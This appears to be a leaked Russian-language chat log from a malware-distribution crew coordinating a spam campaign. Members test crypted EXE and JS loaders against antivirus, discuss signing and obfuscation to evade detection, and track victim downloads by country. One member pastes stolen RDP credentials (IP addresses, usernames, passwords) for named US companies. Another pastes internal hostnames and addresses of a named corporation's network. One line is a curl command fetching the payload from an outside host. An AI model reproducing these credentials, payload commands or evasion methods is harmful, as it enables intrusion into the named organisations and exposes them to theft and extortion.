[2024-01-26 12:32:24] @usernamegg:matrix.bestflowers247.online: ехе
--------------------
[2024-01-26 12:33:58] @lapa:matrix.bestflowers247.online: чисто, путти запустился
--------------------
[2024-01-26 12:34:02] @lapa:matrix.bestflowers247.online: подпись валидная
--------------------
[2024-01-26 12:34:19] @usernamegg:matrix.bestflowers247.online: сейчас попрошу сделать еще его собрать 3-5 штук
--------------------
[2024-01-26 12:34:24] @usernamegg:matrix.bestflowers247.online: я бы RR еще раз прослал
--------------------
[2024-01-26 12:34:32] @usernameugway:matrix.bestflowers247.online: бро привет, как дела? по нагрузке есть чтонибудь интересное?
--------------------
[2024-01-26 12:34:44] @usernamegg:matrix.bestflowers247.online: англия же там
--------------------
[2024-01-26 12:34:46] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-26 12:34:48] @usernameugway:matrix.bestflowers247.online: доработали страые схемы, ждем криптера.. какая-то проблема в датацентре
--------------------
[2024-01-26 12:34:53] @usernamegg:matrix.bestflowers247.online: и тех что я выше скинул
--------------------
[2024-01-26 12:35:26] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> и тех что я выше скинул

каких? которые из юсы?
--------------------
[2024-01-26 12:36:50] @usernamegg:matrix.bestflowers247.online: [15:34:58] 2K24: вообще я раньше делал мне палатили фикс$ мес я делал 5-8 билдов каждый день с понедельника по пятницу
[15:35:36] AA: а как размножать их ?
[15:36:01] 2K24: уникальных билдов
[15:36:13] AA: ну если ты уйдешь к нам в тим и мне твой пейлоад зайдет я готов буду платить тебе фикс$  в месяц но мне надо что бы их можно было разножать до 2к с уникальными хешами для спама
--------------------
[2024-01-26 12:37:00] @usernamegg:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

!
--------------------
[2024-01-26 12:37:22] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-26 12:38:43] @lapa:matrix.bestflowers247.online: icumed.com это юса
--------------------
[2024-01-26 12:38:47] @lapa:matrix.bestflowers247.online: их позже прошлем
--------------------
[2024-01-26 12:39:20] @usernamegg:matrix.bestflowers247.online: ок
--------------------
[2024-01-26 12:39:52] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-01-26 12:40:01] @usernamegg:matrix.bestflowers247.online: все хорошо, спасибо.  как сам ?
--------------------
[2024-01-26 12:40:04] @usernamegg:matrix.bestflowers247.online: нагрузку тестирую
--------------------
[2024-01-26 12:40:50] @usernamegg:matrix.bestflowers247.online: [15:39:06] 2K24: я же говорю что разные хеши уже давноне спасают главное это сама обфускация должна быть другой + сама упаковка играет большую роль, если будешь просто спапить и будет 1 билд и хоть 5к разных хешей ничего не поможет а на оборот усложнит потому как каждый новый хеш будет лететь в облако и это на оборот ускорит детект
--------------------
[2024-01-26 12:42:08] @lapa:matrix.bestflowers247.online: ладно
--------------------
[2024-01-26 12:42:09] @lapa:matrix.bestflowers247.online: ок
--------------------
[2024-01-26 12:42:12] @lapa:matrix.bestflowers247.online: пусть будет 1 файл на выдаче
--------------------
[2024-01-26 12:42:16] @lapa:matrix.bestflowers247.online: все равно точечно шлем
--------------------
[2024-01-26 12:42:29] @lapa:matrix.bestflowers247.online: скоро все проверю еще раз и запущу RR
--------------------
[2024-01-26 12:42:48] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 12:42:55] @usernamegg:matrix.bestflowers247.online: он сделает 5-8 штук
--------------------
[2024-01-26 12:43:04] @usernamegg:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> все равно точечно шлем

это да
--------------------
[2024-01-26 12:43:54] @usernameww:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/nacco-industries-inc/81824112
73.56.75.233:3389@DESKTOPQB\user2022;user2022;United States;Boynton Beach;Florida;Good;No;Win10;19.12.23;
no connect (poprobovat pozhe)


https://www.zoominfo.com/c/harte-hanks/31394759
73.56.75.233:3389@DESKTOPQB\user2022;user2022;United States;Boynton Beach;Florida;Good;No;Win10;15.01.24;
no connect (poprobovat pozhe)


https://www.zoominfo.com/c/agilethought-llc/2132737
20.82.3.93:5050@SimpexVM\test;P@ssw0rd123;United States; ; ;Online;No;2024;21.01.24;
Sajaya Erp, Jordan


https://www.zoominfo.com/c/spok-inc/359821044
154.221.31.242:3389@YISU-62B1A9385A\Administrator;1qaz2wsx;United States;Los Angeles;California;Good;Yes;2024;05.01.24;
kredi ne verni


https://www.zoominfo.com/c/capitol-federal/6701468
104.34.16.226:3390@support;Pa$$w0rd;United States;Costa Mesa;California;Good;No;2024;11.01.24;
dlya etogo polzavatelya politikoi zapreshen vhod


https://www.zoominfo.com/c/silverback-mdm/347945745
3.22.248.134:3389@EC2AMAZ-0CHAVJQ\jack;Password@1;United States;Seattle;Washington;Good;No;2023;11.12.23;
kto to  sidit! Vibivaet RDP (poprobovat pozhe)



https://www.zoominfo.com/c/iteris-inc/59901406
24.97.190.39:63389@CALLACCT1234\fastwind;Klark120;United States;Syracuse;New York;Good;Yes;Win7;27.12.23;
LOCKED



https://www.zoominfo.com/c/rcm-technologies-inc/32211128
173.163.101.137:3389@CLINIC\memorial;memorial;United States; ; ;Good;No;2024;07.01.24;
kredi ne verni
```



--------------------
[2024-01-26 12:44:23] @lapa:matrix.bestflowers247.online: запустил RR
--------------------
[2024-01-26 12:50:04] @usernameugway:matrix.bestflowers247.online: я нормуль
--------------------
[2024-01-26 12:50:12] @usernameugway:matrix.bestflowers247.online: очень интересные темы наокпал
--------------------
[2024-01-26 12:50:19] @usernameugway:matrix.bestflowers247.online: надеюсь хватит знаний разобраться до конца
--------------------
[2024-01-26 12:50:27] @usernameugway:matrix.bestflowers247.online: сижу обучаюсь
--------------------
[2024-01-26 12:50:43] @usernameugway:matrix.bestflowers247.online: ну и софт доработали под спам и под тимсы
--------------------
[2024-01-26 12:50:49] @usernameugway:matrix.bestflowers247.online: разобрались со спуфом и прогревом
--------------------
[2024-01-26 12:51:01] @usernameugway:matrix.bestflowers247.online: остлось налить таргетов)
--------------------
[2024-01-26 12:52:09] @usernamegg:matrix.bestflowers247.online: съездил без палева погрелся ?
--------------------
[2024-01-26 12:52:19] @usernamegg:matrix.bestflowers247.online: друг с й не приезжал туда ?
--------------------
[2024-01-26 12:52:35] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 12:52:42] @usernamegg:matrix.bestflowers247.online: аттачем ведь ?
--------------------
[2024-01-26 12:52:47] @usernamegg:matrix.bestflowers247.online: есть фаил который шлешь ?
--------------------
[2024-01-26 12:52:50] @usernamegg:matrix.bestflowers247.online: посмотреть хочу
--------------------
[2024-01-26 12:53:08] @usernamegg:matrix.bestflowers247.online: я по той ссылке не качал
--------------------
[2024-01-26 12:53:09] @usernamegg:matrix.bestflowers247.online: мало ли
--------------------
[2024-01-26 12:53:23] @usernamegg:matrix.bestflowers247.online: сейчас он еще 10шт выдаст на подпись
--------------------
[2024-01-26 12:53:33] @usernamegg:matrix.bestflowers247.online: а с ехе квака чисто ?
--------------------
[2024-01-26 12:53:52] @lapa:matrix.bestflowers247.online: линками шлю
--------------------
[2024-01-26 12:56:15] @lapa:matrix.bestflowers247.online: Trojan:Win32/Wacatac.H!ml на exe
--------------------
[2024-01-26 12:56:21] @lapa:matrix.bestflowers247.online: на пути не орало конечно
--------------------
[2024-01-26 12:56:34] @usernameugway:matrix.bestflowers247.online: > съездил без палева погрелся ?

да, но я так жестко заболел ппц
--------------------
[2024-01-26 12:56:39] @usernameugway:matrix.bestflowers247.online: 3 дня был в ауте)
--------------------
[2024-01-26 12:56:50] @usernamegg:matrix.bestflowers247.online: ааа
--------------------
[2024-01-26 12:56:52] @usernameugway:matrix.bestflowers247.online: но было очень классно в целом, мне понравилось
--------------------
[2024-01-26 12:56:55] @usernamegg:matrix.bestflowers247.online: Trojan:Win32/Wacatac.H!ml на exe

--------------------
[2024-01-26 12:56:59] @usernameugway:matrix.bestflowers247.online: > друг с й не приезжал туда ?

бля это была отдельная история
--------------------
[2024-01-26 12:57:02] @usernameugway:matrix.bestflowers247.online: я тебе потом расскажу)
--------------------
[2024-01-26 12:57:05] @usernamegg:matrix.bestflowers247.online: чистый надо ехе
--------------------
[2024-01-26 12:57:10] @usernamegg:matrix.bestflowers247.online: палимся (
--------------------
[2024-01-26 12:57:13] @usernameugway:matrix.bestflowers247.online: друг наш как обычно немного отжег
--------------------
[2024-01-26 12:57:16] @usernamegg:matrix.bestflowers247.online: в сборке это спалило ?
--------------------
[2024-01-26 12:57:38] @lapa:matrix.bestflowers247.online: ну js чистый
--------------------
[2024-01-26 12:57:43] @usernamegg:matrix.bestflowers247.online: збс )
--------------------
[2024-01-26 12:57:44] @lapa:matrix.bestflowers247.online: с путти проверял, было все чисто
--------------------
[2024-01-26 12:57:49] @usernamegg:matrix.bestflowers247.online: я бы тоже прилетел )
--------------------
[2024-01-26 12:57:52] @usernamegg:matrix.bestflowers247.online: но не мог
--------------------
[2024-01-26 12:58:01] @usernamegg:matrix.bestflowers247.online: а сейчас спалило
--------------------
[2024-01-26 12:58:05] @usernamegg:matrix.bestflowers247.online: с кваком ехе
--------------------
[2024-01-26 12:58:06] @usernamegg:matrix.bestflowers247.online: я понял
--------------------
[2024-01-26 12:58:09] @usernameugway:matrix.bestflowers247.online: можно на лыжах поктаться потом
--------------------
[2024-01-26 12:58:11] @usernameugway:matrix.bestflowers247.online: дня 3
--------------------
[2024-01-26 12:58:17] @usernamegg:matrix.bestflowers247.online: нет
--------------------
[2024-01-26 12:58:23] @usernamegg:matrix.bestflowers247.online: я туда не двину
--------------------
[2024-01-26 12:58:31] @usernamegg:matrix.bestflowers247.online: мне нельзя )
--------------------
[2024-01-26 12:58:38] @usernamegg:matrix.bestflowers247.online: я выбор свой сделал
--------------------
[2024-01-26 12:58:42] @usernamegg:matrix.bestflowers247.online: максимум где ты был
--------------------
[2024-01-26 12:58:48] @usernameugway:matrix.bestflowers247.online: у нас имею ввиду
--------------------
[2024-01-26 12:59:04] @usernamegg:matrix.bestflowers247.online: аа
--------------------
[2024-01-26 12:59:10] @usernamegg:matrix.bestflowers247.online: некогда все равно
--------------------
[2024-01-26 12:59:15] @usernamegg:matrix.bestflowers247.online: я включился в работу
--------------------
[2024-01-26 12:59:19] @usernameugway:matrix.bestflowers247.online: да, ладно работаем)
--------------------
[2024-01-26 12:59:21] @usernameugway:matrix.bestflowers247.online: я тоже
--------------------
[2024-01-26 12:59:25] @lapa:matrix.bestflowers247.online: ну с юк нет скачиваний
--------------------
[2024-01-26 12:59:29] @lapa:matrix.bestflowers247.online: 5к ушло уже
--------------------
[2024-01-26 13:00:47] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 13:01:17] @usernamegg:matrix.bestflowers247.online: ну линки может тупо не дохода это RR мать его )
--------------------
[2024-01-26 13:01:20] @usernamegg:matrix.bestflowers247.online: контора не простая
--------------------
[2024-01-26 13:01:29] @usernamegg:matrix.bestflowers247.online: мы там пошалить успели
--------------------
[2024-01-26 13:01:39] @usernamegg:matrix.bestflowers247.online: куча данных есть хотя бы одну тачку зацепить
--------------------
[2024-01-26 13:01:57] @lapa:matrix.bestflowers247.online: нет инбоса туда думаю
--------------------
[2024-01-26 13:02:00] @usernameugway:matrix.bestflowers247.online: напиши плиз по нагрузке как будет
--------------------
[2024-01-26 13:02:04] @usernameugway:matrix.bestflowers247.online: я на строил все как в первый раз
--------------------
[2024-01-26 13:02:09] @usernamegg:matrix.bestflowers247.online: JS
--------------------
[2024-01-26 13:02:10] @usernameugway:matrix.bestflowers247.online: когда у нас были отбивки в тимсах
--------------------
[2024-01-26 13:02:23] @lapa:matrix.bestflowers247.online: ща попробую атачем
--------------------
[2024-01-26 13:02:33] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-26 13:02:41] @usernamegg:matrix.bestflowers247.online: это еще аутлук же
--------------------
[2024-01-26 13:02:46] @usernameugway:matrix.bestflowers247.online: связка как была до нг?
--------------------
[2024-01-26 13:03:20] @usernamegg:matrix.bestflowers247.online: чуть другая
--------------------
[2024-01-26 13:03:42] @usernamegg:matrix.bestflowers247.online: збс ты сидишь фиксишь баги конечно
--------------------
[2024-01-26 13:03:46] @lapa:matrix.bestflowers247.online: 84.239.54.74 есть один запуск с юки
--------------------
[2024-01-26 13:03:49] @usernamegg:matrix.bestflowers247.online: второй день тебя нету
--------------------
[2024-01-26 13:03:55] @usernamegg:matrix.bestflowers247.online: оо
--------------------
[2024-01-26 13:04:03] @usernamegg:matrix.bestflowers247.online: с аттача ?
--------------------
[2024-01-26 13:04:09] @usernameugway:matrix.bestflowers247.online: ок, ну можно протестить в любом случае
--------------------
[2024-01-26 13:04:18] @usernamegg:matrix.bestflowers247.online: но ехе все равно вакатак дает ?
--------------------
[2024-01-26 13:04:19] @lapa:matrix.bestflowers247.online: нет
--------------------
[2024-01-26 13:04:21] @lapa:matrix.bestflowers247.online: с линка
--------------------
[2024-01-26 13:04:25] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 13:04:27] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> но ехе все равно вакатак дает ?

да
--------------------
[2024-01-26 13:04:29] @usernamegg:matrix.bestflowers247.online: надо другой ехе
--------------------
[2024-01-26 13:04:34] @usernamegg:matrix.bestflowers247.online: и прослать аттачем
--------------------
[2024-01-26 13:04:40] @usernamegg:matrix.bestflowers247.online: ну что там ?
--------------------
[2024-01-26 13:04:41] @lapa:matrix.bestflowers247.online: бля, но это со вчерашнего просыла что-то
--------------------
[2024-01-26 13:04:43] @lapa:matrix.bestflowers247.online: не с js
--------------------
[2024-01-26 13:04:54] @usernamegg:matrix.bestflowers247.online: аа
--------------------
[2024-01-26 13:04:57] @lapa:matrix.bestflowers247.online: ладно, скоро атачем попробую
--------------------
[2024-01-26 13:05:03] @lapa:matrix.bestflowers247.online: но там один файл js
--------------------
[2024-01-26 13:05:03] @usernamegg:matrix.bestflowers247.online: погоди
--------------------
[2024-01-26 13:05:09] @usernamegg:matrix.bestflowers247.online: ехе новый давай заберем и прольем
--------------------
[2024-01-26 13:05:11] @lapa:matrix.bestflowers247.online: и нет смысла слать атачем так
--------------------
[2024-01-26 13:05:15] @usernamegg:matrix.bestflowers247.online: бентли как выдаст
--------------------
[2024-01-26 13:05:24] @lapa:matrix.bestflowers247.online: 10к слать один и тот же атач тупо
--------------------
[2024-01-26 13:05:25] @usernamegg:matrix.bestflowers247.online: зачем аплево слать еще и точечно
--------------------
[2024-01-26 13:05:35] @usernamegg:matrix.bestflowers247.online: ну сейчас он сделате
--------------------
[2024-01-26 13:05:39] @usernamegg:matrix.bestflowers247.online: 10 файлов
--------------------
[2024-01-26 13:05:40] @lapa:matrix.bestflowers247.online: попробую все же сделать свои зипы, чтобы был js + мусор
--------------------
[2024-01-26 13:06:13] @lapa:matrix.bestflowers247.online: жду exe
--------------------
[2024-01-26 13:07:53] @muaddib6:matrix.org: готово.
--------------------
[2024-01-26 13:08:34] @muaddib6:matrix.org: > <@usernamegg:matrix.bestflowers247.online> ну что там ?

вот
--------------------
[2024-01-26 13:08:35] @burito:matrix.bestflowers247.online: хреново
--------------------
[2024-01-26 13:08:42] @muaddib6:matrix.org: 1.7z
--------------------
[2024-01-26 13:08:48] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 13:08:52] @muaddib6:matrix.org: TfVdSjzAExoaOjoZMnTlAldcPtzXbqjyYDtHRmWeyuTQtMzXin
--------------------
[2024-01-26 13:08:54] @muaddib6:matrix.org: строка
--------------------
[2024-01-26 13:09:00] @usernamegg:matrix.bestflowers247.online: 1.7z
--------------------
[2024-01-26 13:09:04] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 13:09:08] @usernamegg:matrix.bestflowers247.online: TfVdSjzAExoaOjoZMnTlAldcPtzXbqjyYDtHRmWeyuTQtMzXin
строка
--------------------
[2024-01-26 13:09:14] @usernamegg:matrix.bestflowers247.online: ехе от бентли
--------------------
[2024-01-26 13:09:16] @usernamegg:matrix.bestflowers247.online: только выдал
--------------------
[2024-01-26 13:09:22] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-26 13:09:58] @usernamegg:matrix.bestflowers247.online: [16:05:57] AA: сколько еще по времени
[16:06:46] 2K24 собирает JS: думаю окола часа займет и скину
[16:09:50] AA: +++
--------------------
[2024-01-26 13:12:12] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-26 13:16:40] @lapa:matrix.bestflowers247.online: все равно вакатак
--------------------
[2024-01-26 13:20:13] @lapa:matrix.bestflowers247.online: попробую подписать exe
--------------------
[2024-01-26 13:22:29] @burito:matrix.bestflowers247.online: да, вакатаки...
--------------------
[2024-01-26 13:24:22] @lapa:matrix.bestflowers247.online: короч все равно вакатак, даже у подписаного exe
--------------------
[2024-01-26 13:25:12] @lapa:matrix.bestflowers247.online: а какие были айпишинки у сеток с RR ?
--------------------
[2024-01-26 13:26:23] @lapa:matrix.bestflowers247.online: с uk есть так то 5 скачиваний
--------------------
[2024-01-26 13:26:26] @lapa:matrix.bestflowers247.online: но вот запусков нет
--------------------
[2024-01-26 13:33:39] @usernamegg:matrix.bestflowers247.online: не могу найти пока ip
--------------------
[2024-01-26 13:33:44] @usernamegg:matrix.bestflowers247.online: скажу скоро
--------------------
[2024-01-26 13:33:54] @usernamegg:matrix.bestflowers247.online: > <@muaddib6:matrix.org> sent a file.

вакатак
--------------------
[2024-01-26 13:34:12] @usernamegg:matrix.bestflowers247.online: у бентли тоже
--------------------
[2024-01-26 13:34:13] @muaddib6:matrix.org: когда?
--------------------
[2024-01-26 13:34:21] @usernamegg:matrix.bestflowers247.online: вакатак когда ?
--------------------
[2024-01-26 13:34:32] @lapa:matrix.bestflowers247.online: ну когда запуска js
--------------------
[2024-01-26 13:34:36] @lapa:matrix.bestflowers247.online: он скачиваниет exe
--------------------
[2024-01-26 13:34:38] @usernamegg:matrix.bestflowers247.online: ну когда запуска js

--------------------
[2024-01-26 13:34:40] @lapa:matrix.bestflowers247.online: и орет на exe
--------------------
[2024-01-26 13:34:54] @lapa:matrix.bestflowers247.online: * ну после запуска js
--------------------
[2024-01-26 13:35:00] @muaddib6:matrix.org: а если просто ехе запустить?
--------------------
[2024-01-26 13:35:02] @lapa:matrix.bestflowers247.online: при том, что на путти не орало
--------------------
[2024-01-26 13:35:12] @usernamegg:matrix.bestflowers247.online: он скачиваниет exe
и орет на exe
--------------------
[2024-01-26 13:35:21] @usernamegg:matrix.bestflowers247.online: > <@muaddib6:matrix.org> а если просто ехе запустить?

сейчас
--------------------
[2024-01-26 13:35:45] @usernamegg:matrix.bestflowers247.online: а если просто ехе запустить?

--------------------
[2024-01-26 13:35:52] @muaddib6:matrix.org: а просто ехе без js ?
--------------------
[2024-01-26 13:37:44] @lapa:matrix.bestflowers247.online: скоро попробую
--------------------
[2024-01-26 13:38:41] @lapa:matrix.bestflowers247.online: curl -o rr.exe https://amacey.com/x1g/jjj
--------------------
[2024-01-26 13:38:45] @lapa:matrix.bestflowers247.online: ну я вот так попробывал скачать
--------------------
[2024-01-26 13:38:49] @lapa:matrix.bestflowers247.online: палит exe
--------------------
[2024-01-26 13:38:52] @lapa:matrix.bestflowers247.online: не могу скачать
--------------------
[2024-01-26 13:38:54] @lapa:matrix.bestflowers247.online: деф орет
--------------------
[2024-01-26 13:39:10] @usernamegg:matrix.bestflowers247.online: curl -o rr.exe https://amacey.com/x1g/jjj
ну я вот так попробывал скачать
палит exe
не могу скачать
деф орет
--------------------
[2024-01-26 13:39:26] @muaddib6:matrix.org: понял.
--------------------
[2024-01-26 13:39:51] @lapa:matrix.bestflowers247.online: ну короч в статике видимо палит
--------------------
[2024-01-26 13:40:53] @lapa:matrix.bestflowers247.online: с италии 63 запуска в общем
--------------------
[2024-01-26 13:46:55] @usernamenn:matrix.bestflowers247.online: ```
USINRPP-TCT001V.Rolls-Royce.Local  Windows Server 2008 R2 Enterprise
USINDPR-DFS001.Rolls-Royce.Local 10.24.64.129 Windows Server 2008 R2 Enterprise
USINDPP-EC01.Rolls-Royce.Local 10.24.64.75 Windows Server 2008 R2 Enterprise
WIN-26IS702498T.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBWYNPR-HTA003.Rolls-Royce.Local 10.111.135.37 Windows Server 2008 R2 Standard
GBBSTPR-CCM001.Rolls-Royce.Local 10.167.8.20 Windows Server 2008 R2 Standard
GBWYNDV-FNP001.Rolls-Royce.Local 10.127.128.36 Windows Server 2008 R2 Standard
DEBERPR-ESR002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
SG001PR-SQL004.Rolls-Royce.Local  Windows Server 2008 R2 Standard
SG001PR-VMC001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-BUS001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
SG001PP-RAA001V.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-APP005.Rolls-Royce.Local  Windows Server 2008 R2 Standard
INBMTPR-ESM001V.Rolls-Royce.Local 10.234.56.44 Windows Server 2008 R2 Standard
USMSPDR-FSW001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-FSW003.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-HVT002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBROTPR-CCM001.Rolls-Royce.Local 10.167.48.12 Windows Server 2008 R2 Standard
GBDOXPP-INF010V.Rolls-Royce.Local 10.127.3.52 Windows Server 2008 R2 Standard
GBDERDR-CCM001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USINDPR-QAR001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBWYNPR-CXI002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDOXDR-CXI002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDOXDR-CXI001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBWYNPR-CXI001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDOXPR-VCT010M.Rolls-Royce.Local  Windows Server 2008 R2 Standard
gbsndpr-ccm001.Rolls-Royce.Local 10.167.39.7 Windows Server 2008 R2 Standard
SG001PR-KMS001.Rolls-Royce.Local 10.224.0.33 Windows Server 2008 R2 Standard
USINDPR-BCA002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDERPR-HTA001A.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USINDPR-BCA001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-SQL001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
EUSMTVPR-QMM003.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDERDR-AVF002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
DEBERPR-SQL001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
DEBERPP-MES001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
DEBERPR-MES001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
DEBERPR-COM001.Rolls-Royce.Local 10.156.0.16 Windows Server 2008 R2 Standard
gbsndpr-bmc001.Rolls-Royce.Local 10.167.39.176 Windows Server 2008 R2 Standard
SG001PR-APP001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDOXPR-HTA003.Rolls-Royce.Local 10.111.135.40 Windows Server 2008 R2 Standard
DEBERPR-CCM001.Rolls-Royce.Local 10.156.0.14 Windows Server 2008 R2 Standard
```
--------------------
[2024-01-26 13:47:33] @usernamegg:matrix.bestflowers247.online: переделаешь ?
--------------------
[2024-01-26 13:47:49] @usernamegg:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> а какие были айпишинки у сеток с RR ?

USINRPP-TCT001V.Rolls-Royce.Local  Windows Server 2008 R2 Enterprise
USINDPR-DFS001.Rolls-Royce.Local 10.24.64.129 Windows Server 2008 R2 Enterprise
USINDPP-EC01.Rolls-Royce.Local 10.24.64.75 Windows Server 2008 R2 Enterprise
WIN-26IS702498T.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBWYNPR-HTA003.Rolls-Royce.Local 10.111.135.37 Windows Server 2008 R2 Standard
GBBSTPR-CCM001.Rolls-Royce.Local 10.167.8.20 Windows Server 2008 R2 Standard
GBWYNDV-FNP001.Rolls-Royce.Local 10.127.128.36 Windows Server 2008 R2 Standard
DEBERPR-ESR002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
SG001PR-SQL004.Rolls-Royce.Local  Windows Server 2008 R2 Standard
SG001PR-VMC001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-BUS001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
SG001PP-RAA001V.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-APP005.Rolls-Royce.Local  Windows Server 2008 R2 Standard
INBMTPR-ESM001V.Rolls-Royce.Local 10.234.56.44 Windows Server 2008 R2 Standard
USMSPDR-FSW001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-FSW003.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-HVT002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBROTPR-CCM001.Rolls-Royce.Local 10.167.48.12 Windows Server 2008 R2 Standard
GBDOXPP-INF010V.Rolls-Royce.Local 10.127.3.52 Windows Server 2008 R2 Standard
GBDERDR-CCM001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USINDPR-QAR001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBWYNPR-CXI002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDOXDR-CXI002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDOXDR-CXI001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBWYNPR-CXI001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDOXPR-VCT010M.Rolls-Royce.Local  Windows Server 2008 R2 Standard
gbsndpr-ccm001.Rolls-Royce.Local 10.167.39.7 Windows Server 2008 R2 Standard
SG001PR-KMS001.Rolls-Royce.Local 10.224.0.33 Windows Server 2008 R2 Standard
USINDPR-BCA002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDERPR-HTA001A.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USINDPR-BCA001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-SQL001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
EUSMTVPR-QMM003.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDERDR-AVF002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
DEBERPR-SQL001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
DEBERPP-MES001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
DEBERPR-MES001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
DEBERPR-COM001.Rolls-Royce.Local 10.156.0.16 Windows Server 2008 R2 Standard
gbsndpr-bmc001.Rolls-Royce.Local 10.167.39.176 Windows Server 2008 R2 Standard
SG001PR-APP001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDOXPR-HTA003.Rolls-Royce.Local 10.111.135.40 Windows Server 2008 R2 Standard
DEBERPR-CCM001.Rolls-Royce.Local 10.156.0.14 Windows Server 2008 R2 Standard

--------------------
[2024-01-26 13:47:53] @muaddib6:matrix.org: конечно. делаю.
--------------------
[2024-01-26 13:47:55] @usernamegg:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> а какие были айпишинки у сеток с RR ?

* ```
USINRPP-TCT001V.Rolls-Royce.Local  Windows Server 2008 R2 Enterprise
USINDPR-DFS001.Rolls-Royce.Local 10.24.64.129 Windows Server 2008 R2 Enterprise
USINDPP-EC01.Rolls-Royce.Local 10.24.64.75 Windows Server 2008 R2 Enterprise
WIN-26IS702498T.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBWYNPR-HTA003.Rolls-Royce.Local 10.111.135.37 Windows Server 2008 R2 Standard
GBBSTPR-CCM001.Rolls-Royce.Local 10.167.8.20 Windows Server 2008 R2 Standard
GBWYNDV-FNP001.Rolls-Royce.Local 10.127.128.36 Windows Server 2008 R2 Standard
DEBERPR-ESR002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
SG001PR-SQL004.Rolls-Royce.Local  Windows Server 2008 R2 Standard
SG001PR-VMC001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-BUS001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
SG001PP-RAA001V.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-APP005.Rolls-Royce.Local  Windows Server 2008 R2 Standard
INBMTPR-ESM001V.Rolls-Royce.Local 10.234.56.44 Windows Server 2008 R2 Standard
USMSPDR-FSW001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-FSW003.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USMAWPR-HVT002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBROTPR-CCM001.Rolls-Royce.Local 10.167.48.12 Windows Server 2008 R2 Standard
GBDOXPP-INF010V.Rolls-Royce.Local 10.127.3.52 Windows Server 2008 R2 Standard
GBDERDR-CCM001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
USINDPR-QAR001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBWYNPR-CXI002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDOXDR-CXI002.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDOXDR-CXI001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBWYNPR-CXI001.Rolls-Royce.Local  Windows Server 2008 R2 Standard
GBDOXPR-VCT010M.Rolls-Royce.Local  Windows Server 2008 R2 Standard
